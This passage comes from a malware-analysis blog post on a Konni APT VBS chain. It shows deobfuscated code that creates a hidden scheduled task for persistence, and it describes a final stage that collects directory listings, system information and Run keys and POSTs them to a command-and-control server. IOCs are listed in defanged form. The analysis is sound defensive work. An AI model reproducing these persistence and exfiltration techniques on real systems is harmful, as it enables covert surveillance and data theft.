<p>During the analysis the url was active and when sending the request to the url with any computername we receive the output. The output looks similar to the vbs code we deobfuscated in the above stage.</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126115250.png" alt="" /></p>

<p>I used the same python script created in earlier stage and it worked in this case also and this time the output shows some new keywords like schtasks, WScript.Shell.
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126115414.png" alt="" /></p>

<p>Similar to stage 1, after replacing the variables value with the output of the script we found that this time a schedule task will be created and name of the task will be <strong>WeChatVersionAutoUpdate</strong>, frequency is every 10 mins and the file is the vbs present in our Public User Directory .</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">WVYizmUVLdRpNux</span> <span class="o">=</span> <span class="n">m0ZsX6BmI5E</span> <span class="o">&amp;</span> <span class="nc">Chr</span><span class="p">(</span><span class="mi">34</span><span class="p">)</span> <span class="o">&amp;</span> <span class="n">zC6JdUI0Tsi</span> <span class="o">&amp;</span> <span class="nc">Chr</span><span class="p">(</span><span class="mi">34</span><span class="p">)</span> <span class="o">&amp;</span> <span class="n">h1ub38dv</span> <span class="o">&amp;</span> <span class="nc">Chr</span><span class="p">(</span><span class="mi">34</span><span class="p">)</span> <span class="o">&amp;</span> <span class="n">WScript</span><span class="p">.</span><span class="n">ScriptFullName</span> <span class="o">&amp;</span> <span class="nc">Chr</span><span class="p">(</span><span class="mi">34</span><span class="p">)</span> <span class="o">&amp;</span> <span class="n">R52bXZrrdxrm</span> 
<span class="n">pqMHgeKOpmHHh</span><span class="p">.</span><span class="n">Run</span> <span class="n">WVYizmUVLdRpNux</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="bp">False</span>

<span class="n">WVYizmUVLdRpNux</span> <span class="o">=</span> <span class="n">schtasks</span> <span class="o">/</span><span class="n">create</span> <span class="o">/</span><span class="n">sc</span> <span class="n">minute</span> <span class="o">/</span><span class="n">mo</span> <span class="mi">10</span> <span class="o">/</span><span class="n">tn</span> <span class="o">&amp;</span> <span class="sh">"</span><span class="s"> &amp; WeChatVersionAutoUpdate &amp; </span><span class="sh">"</span> <span class="o">&amp;</span> <span class="o">/</span><span class="n">tr</span> <span class="o">&amp;</span> <span class="sh">"</span><span class="s"> &amp; WScript.ScriptFullName &amp; </span><span class="sh">"</span> <span class="o">&amp;</span> <span class="o">/</span><span class="n">f</span>
<span class="n">Wscript</span><span class="p">.</span><span class="n">Shell</span><span class="p">.</span><span class="n">Run</span> <span class="n">WVYizmUVLdRpNux</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="bp">False</span>
</code></pre></div></div>

<p>I was thinking that what will be the use of downloading the same vbs again and again and then creating the same schedule task again. But as I always say in security don’t assume anything, I revisited the site and refreshed the page but this time the vbs code changed. This means when you first visit the URL with unique computername it will send you the vbs code to create the schedule task but after that it will ask return the another vbs which we will checking in stage4.</p>
<h2 id="stage-4">Stage 4</h2>

<p>As explained above we recevied the new code this time and the same obfuscation is used here also.</p>

<p><img src="/assets/img/Konni_Mal/Pasted%20image%2020240126120015.png" alt="" /></p>

<p>Using the script to deobfuscate the vbs code and checking the output. But this time it is very interesting this time we don’t have GET method we have POST method.</p>

<p>Malware now send information to the same domain but the endpoint is changed.
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126120106.png" alt="" /></p>

<p>From the below image we can find that there are dir command used on multiple directory like Downloads, Documents, Users etc and stored in different files
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126120119.png" alt="" /></p>

<p>Other than dir enumeration, malware also checks the IP details, systeminfo, process running, what are the keys of the CurrentVersion\RUN Key and then send all the files data to the url.
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126120144.png" alt="" /></p>

<h4 id="how-code-flow-works-">How code flow works ?</h4>
<p>In the last vbs code there is a function and for all the commands output those are stored in the file, those filenames are sent to MX0Wu3ou and then data is read from the file and send to the url and file will be deleted.</p>

<ul>
  <li>MX0Wu3ou Function definition, it takes two arguments
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126202819.png" alt="" /></li>
</ul>

<p>After removing all the xor operations and other garbage these are the commands executed [ I have converted the variable names to meaningful ].</p>
<ul>
  <li>FileSystemObject is created and using this malware will read the file which is provided as argument to the function and then file will be deleted</li>
  <li>The data to be sent is convert into the format: alias=&lt;computername&gt;&amp;name=&lt;filename&gt;&amp;data=&lt;FileContent&gt;</li>
  <li>Then the data sent to the url using post method
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126203631.png" alt="" /></li>
</ul>

<p>Before calling the function MX0Wu3ou the CurrentDirectory is set to the public user Library folder from where the vbs script is executing and then using the cmd.exe commands are executed and saved to files.<br />
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126210118.png" alt="" /></p>

<p><strong>How function MX0Wu3ou is called ?</strong> After the XOR operation we have the filename to send as first argument and the second argument will always be our computername.
<img src="/assets/img/Konni_Mal/Pasted%20image%2020240126203909.png" alt="" /></p>

<p>Then after every 10 mins the schedule task will run and the vbs will be downloaded and as the computer is unique the second vbs will be download and all details will be collected again and send to the malware author.</p>

<h2 id="iocs">IOCs</h2>

<h3 id="url">URL</h3>

<table>
  <tbody>
    <tr>
      <td>Value</td>
      <td>Description</td>
    </tr>
    <tr>
      <td>hxxps[://]shaira1885[.]com/wp-admin/includes/class-wp-release-data[.]php?class=</td>
      <td>Gets next stage payloads</td>
    </tr>
    <tr>
      <td>hxxps[://]shaira1885[.]com/wp-admin/includes/class-wp-release-data[.]php</td>
      <td>Send the Data using POST method</td>
    </tr>
  </tbody>
</table>

<h3 id="file-names">File Names</h3>

<table>
  <thead>
    <tr>
      <th>Value</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>vc98ee3f0.vbs</td>
    </tr>
  </tbody>
</table>

<h3 id="hashes">Hashes</h3>

<table>
  <thead>
    <tr>
      <th>Hash Type</th>
      <th>Value</th>
      <th>Description</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>SHA1</td>
      <td>2b1a9f3fbfc6f2a3efd8d2ed0d1a85ae839b4d31</td>
      <td>vc98ee3f0.vbs</td>
    </tr>
    <tr>
      <td>SHA1</td>
      <td>ea8037e7c58dade74a27493c327b18fb06e600f5</td>
      <td>2nd_stage.vbs: Payload used to setup the scheduled task</td>
    </tr>
    <tr>
      <td>SHA1</td>
      <td>e44e0021a1d866b19ddba09d395180f69f686290</td>
      <td>final_vbs.vbs: Payload used to collect the user system data</td>
    </tr>
  </tbody>
</table>

    
    </section>

    <!-- Social media shares -->
    

<div class="share-buttons">
    <ul class="share-buttons">
        <li class="meta">Share</li>
        
        <li>
            <a href="https://www.facebook.com/sharer/sharer.php?u=http://localhost:4000/2024/01/26/Konni-APT-LNK-Analysis.html" target="_blank"
               title=" Facebook">
                <i class="fab fa-facebook-square fa-2x" aria-hidden="true"></i>
                <span class="sr-only">Share on Facebook</span>
            </a>
        </li>
         
        <li>
            <a href="https://twitter.com/intent/tweet?text=Konni+%5B+North+Korea-linked+APT+group+%5D+LNK+Analysis%20http%3A%2F%2Flocalhost%3A4000%2F2024%2F01%2F26%2FKonni-APT-LNK-Analysis.html"
               target="_blank" title="">
                <i class="fab fa-twitter-square fa-2x" aria-hidden="true"></i>
                <span class="sr-only">Tweet</span>
            </a>
        </li>
            
        <li>
            <a href="https://www.reddit.com/submit?url=http://localhost:4000/2024/01/26/Konni-APT-LNK-Analysis.html&title=Konni+%5B+North+Korea-linked+APT+group+%5D+LNK+Analysis%20%7C%20Security+Blogs"
               target="_blank" title=" Reddit">
                <i class="fab fa-reddit-square fa-2x" aria-hidden="true"></i>
                <span class="sr-only">Share on Reddit</span>
            </a>
        </li>
         
        <li>
            <a href="https://www.linkedin.com/shareArticle?mini=true&url=http://localhost:4000/2024/01/26/Konni-APT-LNK-Analysis.html&title=Konni+%5B+North+Korea-linked+APT+group+%5D+LNK+Analysis%20%7C%20Security+Blogs&summary=&source=http://localhost:4000/2024/01/26/Konni-APT-LNK-Analysis.html"
               target="_blank" title=" LinkedIn">
                <i class="fab fa-linkedin fa-2x" aria-hidden="true"></i>
                <span class="sr-only">Share on LinkedIn</span>
            </a>
        </li>
          
        <li>
            <a href="mailto:?subject=Konni [ North Korea-linked APT group ] LNK Analysis%20%7C%20Security Blogs&body=http://localhost:4000/2024/01/26/Konni-APT-LNK-Analysis.html"
               target="_blank" title="">
                <i class="fas fa-envelope-square fa-2x" aria-hidden="true"></i>
                <span class="sr-only">Email</span></a>
        </li>
        
    </ul>
</div>




    <!-- Tag list -->
    
    


  <div class="tag-list"></div>



</article>




<!-- To change color of links in the page --> <style> header#main { background-size: cover; background-repeat: no-repeat; background-position: center; } header#main { background-image: url('/assets/img/feature-img/konni.jpg'); } </style> <!-- Post navigation --> <div id="post-nav"> <div id="next-post"> <a alt="Anti-VM, Anti-Debug & Anti-* Bypass Part - 1" href="/2024/01/22/Malware-Anti-Analysis-&-Anti-Debug-Bypass.html"> <p>Next post</p> Anti-VM, Anti-Debug & Anti-* Bypass Part - 1 </a> </div> </div> <!--Utterances--> <!-- Cusdis --> <!-- Disqus -->


    </div>
    
    <footer class="site-footer"> <div class="footer-icons"> <ul> <!-- Social icons from Font Awesome, if enabled --> <li> <a feed.xml href="/feed.xml" title="Follow RSS feed" target="_blank"> <span class="fa-stack fa-lg"> <i class="fas fa-circle fa-stack-2x"></i> <i class="fas fa-rss fa-stack-1x fa-inverse"></i> </span> </a> </li> <li> <a href="https://github.com/SatyenderYadav" title="Follow on Github" target="_blank" rel="noopener"> <span class="fa-stack fa-lg"> <i class="fas fa-circle fa-stack-2x"></i> <i class="fab fa-github fa-stack-1x fa-inverse"></i> </span> </a> </li> <li> <a href="https://twitter.com/thedeadthinker" title="Follow on Twitter" target="_blank" rel="noopener"> <span class="fa-stack fa-lg"> <i class="fas fa-circle fa-stack-2x"></i> <i class="fab fa-twitter fa-stack-1x fa-inverse"></i> </span> </a> </li> </ul> </div> </footer>
  </body>
</html>
